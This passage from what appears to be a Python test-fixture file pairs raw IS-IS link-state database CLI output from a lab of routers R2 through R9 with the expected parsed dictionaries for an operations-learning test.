TopoId: 2
MtExtend IS : R3.01 Metric : 10
R4.03 Metric : 10
R3.05 Metric : 10
IPv6 Address : 2001:db8:3:3:3::3
MT-IPv6 Prefx : TopoId : 2
2001:db8:3:3:3::3/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:2::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:16386 Att: 0 Ol: 0
Digest Offset : 0
R3.01-00 0x00000352 0xEF24 866 0/0/0/3
Instance : 0x00000351
Extended IS : R3.00 Metric : 0
Extended IS : R5.00 Metric : 0
Digest Offset : 0
R3.05-00 0x0000034D 0xDDD0 676 0/0/0/3
Instance : 0x0000034C
Extended IS : R3.00 Metric : 0
Extended IS : R6.00 Metric : 0
Digest Offset : 0
R4.00-00 0x00000353 0x4A65 778 0/0/0/1
Instance : 0x0000034F
Area Address : 49.0002
Extended IS : R4.03 Metric : 10
Extended IS : R5.02 Metric : 10
NLPID : 0xCC 0x8E
IP Address : 4.4.4.4
Extended IP : 4.4.4.4/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.4.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.4.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R4 Length : 2
TopoId: 2
MtExtend IS : R4.03 Metric : 10
R5.02 Metric : 10
IPv6 Address : 2001:db8:4:4:4::4
MT-IPv6 Prefx : TopoId : 2
2001:db8:4:4:4::4/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:4::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Digest Offset : 0
R4.03-00 0x0000034B 0x54C6 902 0/0/0/1
Instance : 0x0000034A
Extended IS : R4.00 Metric : 0
Extended IS : R3.00 Metric : 0
Digest Offset : 0
R5.00-00 0x0000034D 0xDFA6 984 1/0/0/3
Instance : 0x0000034B
Area Address : 49.0002
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:16386 Att: 0 Ol: 0
Hostname : R5 Length : 2
Extended IS : R5.03 Metric : 10
Extended IS : R3.01 Metric : 10
Extended IS : R5.02 Metric : 10
TopoId: 2
MtExtend IS : R5.03 Metric : 10
R3.01 Metric : 10
R5.02 Metric : 10
IP Address : 5.5.5.5
Extended IP : 5.5.5.5/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.4.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.5.7.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:5:5:5::5
MT-IPv6 Prefx : TopoId : 2
2001:db8:5:5:5::5/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:4::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:5::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R5.02-00 0x0000034E 0xA5B5 651 0/0/0/3
Instance : 0x0000034D
Extended IS : R5.00 Metric : 0
Extended IS : R4.00 Metric : 0
Digest Offset : 0
R5.03-00 0x0000034F 0x9C89 897 0/0/0/3
Instance : 0x0000034E
Extended IS : R5.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
R6.00-00 0x000004B3 0xA52C 987 0/0/0/1
Instance : 0x000004B1
Area Address : 49.0002
NLPID : 0xCC 0x8E
Router ID : 6.6.6.6
IP Address : 6.6.6.6
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R6 Length : 2
TopoId: 2
MtExtend IS : R3.05 Metric : 40
R7.02 Metric : 40
Extended IS : R3.05 Metric : 40
Extended IS : R7.02 Metric : 40
Extended IP : 6.6.6.0/24 Metric : 1 (U)
Extended IP : 10.6.7.0/24 Metric : 40 (U)
Extended IP : 10.3.6.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:db8:6:6:6::6/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:6::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:3::/64 Metric : 40 (U/I)
Digest Offset : 0
R7.00-00 * 0x000004B6 0x425F 787 1/0/0/3
Instance : 0x000004B6
Area Address : 49.0002
NLPID : 0xCC 0x8E
Router ID : 7.7.7.7
IP Address : 7.7.7.7
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R7 Length : 2
TopoId: 2
MtExtend IS : R7.02 Metric : 40
R5.03 Metric : 40
Extended IS : R7.02 Metric : 40
Extended IS : R5.03 Metric : 40
Extended IP : 10.7.8.0/24 Metric : 40 (D)
Extended IP : 7.7.7.7/32 Metric : 1 (U)
Extended IP : 10.7.9.0/24 Metric : 40 (U)
Extended IP : 10.6.7.0/24 Metric : 40 (U)
Extended IP : 10.5.7.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:7::/64 Metric : 40 (D/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:7:7:7::7/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:77::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:6::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:5::/64 Metric : 40 (U/I)
Digest Offset : 0
R7.02-00 * 0x000004B2 0x25F2 697 0/0/0/3
Instance : 0x000004B2
Extended IS : R6.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
IS-IS Level-2 Link State Database
LSPID Seq Number Checksum Lifetime A/P/O/T
R2.00-00 0x00000351 0x4E40 870 0/0/0/3
Instance : 0x0000034D
Area Address : 49.0001
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R2 Length : 2
Extended IS : R3.07 Metric : 10
TopoId: 2
MtExtend IS : R3.07 Metric : 10
IP Address : 2.2.2.2
Extended IP : 2.2.2.2/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.1.2.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.2.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 1.1.1.1/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:2:2:2::2
MT-IPv6 Prefx : TopoId : 2
2001:db8:2:2:2::2/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:1:1:1::1/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:1::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:2::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R3.00-00 0x00000359 0xC91D 618 0/0/0/3
Instance : 0x00000353
Area Address : 49.0002
Extended IS : R3.01 Metric : 10
Extended IS : R3.07 Metric : 10
NLPID : 0xCC 0x8E
IP Address : 3.3.3.3
Extended IP : 3.3.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.2.3.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.4.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.6.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 4.4.4.4/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 5.5.5.5/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.4.5.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.5.7.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 7.7.7.7/32 Metric : 21 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.7.9.0/24 Metric : 60 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.6.7.0/24 Metric : 50 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 6.6.6.0/24 Metric : 11 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Hostname : R3 Length : 2
TopoId: 2
MtExtend IS : R3.01 Metric : 10
R3.07 Metric : 10
IPv6 Address : 2001:db8:3:3:3::3
MT-IPv6 Prefx : TopoId : 2
2001:db8:3:3:3::3/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:2::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:4:4:4::4/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:5:5:5::5/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:4::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:5::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:7:7:7::7/128 Metric : 21 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:77::/64 Metric : 60 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:6:6:6::6/128 Metric : 11 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:6::/64 Metric : 50 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Digest Offset : 0
R3.01-00 0x0000034F 0xF521 712 0/0/0/3
Instance : 0x0000034E
Extended IS : R3.00 Metric : 0
Extended IS : R5.00 Metric : 0
Digest Offset : 0
R3.07-00 0x00000351 0xC77A 1086 0/0/0/3
Instance : 0x00000350
Extended IS : R3.00 Metric : 0
Extended IS : R2.00 Metric : 0
Digest Offset : 0
R5.00-00 0x00000353 0xC9D4 606 0/0/0/3
Instance : 0x00000351
Area Address : 49.0002
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R5 Length : 2
Extended IS : R5.03 Metric : 10
Extended IS : R3.01 Metric : 10
TopoId: 2
MtExtend IS : R5.03 Metric : 10
R3.01 Metric : 10
IP Address : 5.5.5.5
Extended IP : 5.5.5.5/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.4.5.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.5.7.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 7.7.7.7/32 Metric : 11 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.7.9.0/24 Metric : 50 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.6.7.0/24 Metric : 50 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 4.4.4.4/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.4.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 3.3.3.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.2.3.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.3.6.0/24 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 6.6.6.0/24 Metric : 21 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:5:5:5::5
MT-IPv6 Prefx : TopoId : 2
2001:db8:5:5:5::5/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:3::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:4::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:5::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:7:7:7::7/128 Metric : 11 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:6::/64 Metric : 50 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:77::/64 Metric : 50 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:3:3:3::3/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:4:4:4::4/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:2::/64 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
MT-IPv6 Prefx : TopoId : 2
2001:db8:6:6:6::6/128 Metric : 21 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R5.03-00 0x0000034E 0xB6F8 642 0/0/0/3
Instance : 0x0000034D
Extended IS : R5.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
R7.00-00 * 0x000004B5 0x59EB 926 0/0/0/3
Instance : 0x000004B5
Area Address : 49.0002
NLPID : 0xCC 0x8E
Router ID : 7.7.7.7
IP Address : 7.7.7.7
MT TopoId : TopoId:2 Att: 0 Ol: 0
TopoId:0 Att: 0 Ol: 0
Hostname : R7 Length : 2
TopoId: 2
MtExtend IS : R5.03 Metric : 40
R9.01 Metric : 40
R8.01 Metric : 40
Extended IS : R5.03 Metric : 40
Extended IS : R9.01 Metric : 40
Extended IS : R8.01 Metric : 40
Extended IP : 10.6.7.0/24 Metric : 40 (U)
Extended IP : 7.7.7.7/32 Metric : 1 (U)
Extended IP : 10.7.9.0/24 Metric : 40 (U)
Extended IP : 10.7.8.0/24 Metric : 40 (U)
Extended IP : 10.5.7.0/24 Metric : 40 (U)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:6::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:7:7:7::7/128 Metric : 1 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:77::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:7::/64 Metric : 40 (U/I)
MT-IPv6 Prefx : TopoId : 2
2001:db8:10:5::/64 Metric : 40 (U/I)
Digest Offset : 0
R8.00-00 0x0000034E 0x7758 1116 0/0/0/3
Instance : 0x0000034C
Area Address : 49.0003
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R8 Length : 2
Extended IS : R8.01 Metric : 10
TopoId: 2
MtExtend IS : R8.01 Metric : 10
IP Address : 8.8.8.8
Extended IP : 8.8.8.8/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.7.8.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:8:8:8::8
MT-IPv6 Prefx : TopoId : 2
2001:db8:8:8:8::8/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:7::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R8.01-00 0x0000034E 0xF753 770 0/0/0/3
Instance : 0x0000034D
Extended IS : R8.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
R9.00-00 0x0000034A 0x6C98 871 0/0/0/3
Instance : 0x00000347
Area Address : 49.0004
NLPID : 0xCC 0x8E
MT TopoId : TopoId:0 Att: 0 Ol: 0
TopoId:2 Att: 0 Ol: 0
Hostname : R9 Length : 2
Extended IS : R9.01 Metric : 10
TopoId: 2
MtExtend IS : R9.01 Metric : 10
IP Address : 9.9.9.9
Extended IP : 9.9.9.9/32 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.7.9.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.9.10.0/24 Metric : 10 (U)
Unknown Sub-TLV : Length : 1 Type : 4
Extended IP : 10.10.10.10/32 Metric : 20 (U)
Unknown Sub-TLV : Length : 1 Type : 4
IPv6 Address : 2001:db8:9:9:9::9
MT-IPv6 Prefx : TopoId : 2
2001:db8:9:9:9::9/128 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:7::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:9::/64 Metric : 10 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
2001:db8:10:10:10::10/128 Metric : 20 (U/I)
Unknown Sub-TLV : Length : 1 Type : 4
Digest Offset : 0
R9.01-00 0x00000352 0x5624 718 0/0/0/3
Instance : 0x00000351
Extended IS : R9.00 Metric : 0
Extended IS : R7.00 Metric : 0
Digest Offset : 0
'''
isisOpsOutput = {
'instance': {
'test': {
'process_id': 'test',
'vrf': {
'VRF1': {
'area_address': ['49.0002'],
'enable': True,
'graceful_restart': {
'enable': True,
},
'hostname_db': {
'hostname': {
'2222.2222.2222.00-00': {
'hostname': 'R2',
},
'7777.7777.7777.00-00': {
'hostname': 'R7',
},
},
},
'interfaces': {
'Ethernet1/5': {
'adjacencies': {
'R2': {
'neighbor_snpa': {
'fa16.3e63.eab0': {
'level': {
'level-2': {
'hold_timer': 9,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_1': {
'interval': 10,
},
'level_2': {
'interval': 10,
},
},
'hello_multiplier': {
'level_1': {
'multiplier': 3,
},
'level_2': {
'multiplier': 3,
},
},
'level_type': 'level-1-2',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/5',
'priority': {
'level_1': {
'priority': 64,
},
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'loopback1': {
'level_type': 'level-1-2',
'name': 'loopback1',
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 1,
},
'level_2': {
'metric': 1,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 1,
},
'level_2': {
'metric': 1,
},
},
'name': '2',
},
},
},
},
'lsp_mtu': 1492,
'metric_type': {
'value': 'wide-only',
},
'system_id': '7777.7777.7777',
'topologies': {
'0': {
'preference': {
'coarse': {
'default': 115,
},
},
'topology': '0',
},
'2': {
'preference': {
'coarse': {
'default': 115,
},
},
'topology': '2',
},
},
'vrf': 'VRF1',
},
'default': {
'area_address': ['49.0002'],
'enable': True,
'graceful_restart': {
'enable': True,
},
'hostname_db': {
'hostname': {
'2222.2222.2222.00-00': {
'hostname': 'R2',
},
'3333.3333.3333.00-00': {
'hostname': 'R3',
},
'4444.4444.4444.00-00': {
'hostname': 'R4',
},
'5555.5555.5555.00-00': {
'hostname': 'R5',
},
'6666.6666.6666.00-00': {
'hostname': 'R6',
},
'7777.7777.7777.00-00': {
'hostname': 'R7',
},
'8888.8888.8888.00-00': {
'hostname': 'R8',
},
'9999.9999.9999.00-00': {
'hostname': 'R9',
},
},
},
'interfaces': {
'Ethernet1/1': {
'adjacencies': {
'R5': {
'neighbor_snpa': {
'fa16.3ed0.46fc': {
'level': {
'level-1': {
'hold_timer': 8,
'state': 'Up',
},
'level-2': {
'hold_timer': 9,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_1': {
'interval': 10,
},
'level_2': {
'interval': 10,
},
},
'hello_multiplier': {
'level_1': {
'multiplier': 3,
},
'level_2': {
'multiplier': 3,
},
},
'level_type': 'level-1-2',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/1',
'passive': True,
'priority': {
'level_1': {
'priority': 64,
},
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'Ethernet1/2': {
'adjacencies': {
'R6': {
'neighbor_snpa': {
'5e00.4005.0007': {
'level': {
'level-1': {
'hold_timer': 30,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_2': {
'interval': 10,
},
},
'hello_multiplier': {
'level_2': {
'multiplier': 3,
},
},
'level_type': 'level-1-only',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/2',
'priority': {
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'Ethernet1/3': {
'adjacencies': {
'R8': {
'neighbor_snpa': {
'fa16.3eed.aa40': {
'level': {
'level-2': {
'hold_timer': 8,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_1': {
'interval': 10,
},
'level_2': {
'interval': 10,
},
},
'hello_multiplier': {
'level_1': {
'multiplier': 3,
},
'level_2': {
'multiplier': 3,
},
},
'level_type': 'level-2-only',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/3',
'priority': {
'level_1': {
'priority': 64,
},
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'Ethernet1/4': {
'adjacencies': {
'R9': {
'neighbor_snpa': {
'fa16.3e06.ce8d': {
'level': {
'level-2': {
'hold_timer': 9,
'state': 'Up',
},
},
},
},
},
},
'hello_interval': {
'level_1': {
'interval': 10,
},
},
'hello_multiplier': {
'level_1': {
'multiplier': 3,
},
},
'level_type': 'level-1-2',
'lsp_pacing_interval': 33,
'name': 'Ethernet1/4',
'priority': {
'level_1': {
'priority': 64,
},
'level_2': {
'priority': 64,
},
},
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 40,
},
'level_2': {
'metric': 40,
},
},
'name': '2',
},
},
},
'loopback0': {
'level_type': 'level-1-2',
'name': 'loopback0',
'topologies': {
'0': {
'metric': {
'level_1': {
'metric': 1,
},
'level_2': {
'metric': 1,
},
},
'name': '0',
},
'2': {
'metric': {
'level_1': {
'metric': 1,
},
'level_2': {
'metric': 1,
},
},
'name': '2',
},
},
},
},
'lsp_mtu': 1492,
'metric_type': {
'value': 'wide-only',
},
'system_id': '7777.7777.7777',
'topologies': {
'0': {
'preference': {
'coarse': {
'default': 115,
},
},
'topology': '0',
},
'2': {
'preference': {
'coarse': {
'default': 115,
},
},
'topology': '2',
},
},
'vrf': 'default',
},
},
},
},
}
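    # Hedged sketch (assumption): these attributes pair raw CLI captures with
    # their expected parsed form, so a unit test can stub device.execute and
    # diff the learned data against isisOpsOutput. 'learn_fn' stands in for
    # the real genielibs learn/parse entry point, which is wired differently.
    @staticmethod
    def _example_check(learn_fn):
        from unittest.mock import Mock
        device = Mock()
        device.execute = Mock(return_value=IsisOutput.showIsisVrfAll)
        assert learn_fn(device) == IsisOutput.isisOpsOutput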
isisLsdbOpsOutput = {
'instance': {
'test': {
'vrf': {
'default': {
'level_db': {
1: {
'R3.00-00': {
'checksum': '0xD12B',
'dynamic_hostname': 'R3',
'extended_ipv4_reachability': {
'10.2.3.0/24': {
'ip_prefix': '10.2.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.4.0/24': {
'ip_prefix': '10.3.4.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.5.0/24': {
'ip_prefix': '10.3.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.3.6.0/24': {
'ip_prefix': '10.3.6.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'3.3.3.0/24': {
'ip_prefix': '3.3.3.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
},
'extended_is_neighbor': {
'R3.01': {
'metric': 10,
'neighbor_id': 'R3.01',
},
'R3.05': {
'metric': 10,
'neighbor_id': 'R3.05',
},
'R4.03': {
'metric': 10,
'neighbor_id': 'R4.03',
},
},
'ipv4_addresses': ['3.3.3.3'],
'ipv6_addresses': ['2001:db8:3:3:3::3'],
'lsp_id': 'R3.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'16386': {
'attributes': '0',
'mt_id': '16386',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:2::/64': {
'ip_prefix': '2001:db8:10:2::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:3:3:3::3/128': {
'ip_prefix': '2001:db8:3:3:3::3',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R3.05': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R3.05',
},
},
'remaining_lifetime': 712,
'sequence': '0x00000354',
},
'R3.01-00': {
'checksum': '0xEF24',
'extended_is_neighbor': {
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
'R5.00': {
'metric': 0,
'neighbor_id': 'R5.00',
},
},
'lsp_id': 'R3.01-00',
'remaining_lifetime': 866,
'sequence': '0x00000352',
},
'R3.05-00': {
'checksum': '0xDDD0',
'extended_is_neighbor': {
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
'R6.00': {
'metric': 0,
'neighbor_id': 'R6.00',
},
},
'lsp_id': 'R3.05-00',
'remaining_lifetime': 676,
'sequence': '0x0000034D',
},
'R4.00-00': {
'checksum': '0x4A65',
'dynamic_hostname': 'R4',
'extended_ipv4_reachability': {
'10.3.4.0/24': {
'ip_prefix': '10.3.4.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.4.5.0/24': {
'ip_prefix': '10.4.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'4.4.4.4/32': {
'ip_prefix': '4.4.4.4',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
},
'extended_is_neighbor': {
'R4.03': {
'metric': 10,
'neighbor_id': 'R4.03',
},
'R5.02': {
'metric': 10,
'neighbor_id': 'R5.02',
},
},
'ipv4_addresses': ['4.4.4.4'],
'ipv6_addresses': ['2001:db8:4:4:4::4'],
'lsp_id': 'R4.00-00',
'mt_entries': {
'0': {
'attributes': '0',
'mt_id': '0',
},
'2': {
'attributes': '0',
'mt_id': '2',
},
},
'mt_ipv6_reachability': {
'2001:db8:10:3::/64': {
'ip_prefix': '2001:db8:10:3::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:10:4::/64': {
'ip_prefix': '2001:db8:10:4::',
'metric': 10,
'mt_id': '2',
'prefix_len': '64',
'up_down': True,
},
'2001:db8:4:4:4::4/128': {
'ip_prefix': '2001:db8:4:4:4::4',
'metric': 10,
'mt_id': '2',
'prefix_len': '128',
'up_down': True,
},
},
'mt_is_neighbor': {
'R5.02': {
'metric': 10,
'mt_id': '2',
'neighbor_id': 'R5.02',
},
},
'remaining_lifetime': 778,
'sequence': '0x00000353',
},
'R4.03-00': {
'checksum': '0x54C6',
'extended_is_neighbor': {
'R3.00': {
'metric': 0,
'neighbor_id': 'R3.00',
},
'R4.00': {
'metric': 0,
'neighbor_id': 'R4.00',
},
},
'lsp_id': 'R4.03-00',
'remaining_lifetime': 902,
'sequence': '0x0000034B',
},
'R5.00-00': {
'checksum': '0xDFA6',
'dynamic_hostname': 'R5',
'extended_ipv4_reachability': {
'10.3.5.0/24': {
'ip_prefix': '10.3.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.4.5.0/24': {
'ip_prefix': '10.4.5.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'10.5.7.0/24': {
'ip_prefix': '10.5.7.0',
'metric': 10,
'prefix_len': '24',
'up_down': True,
},
'5.5.5.5/32': {
'ip_prefix': '5.5.5.5',
'metric': 10,
'prefix_len': '32',
'up_down': True,
},
},
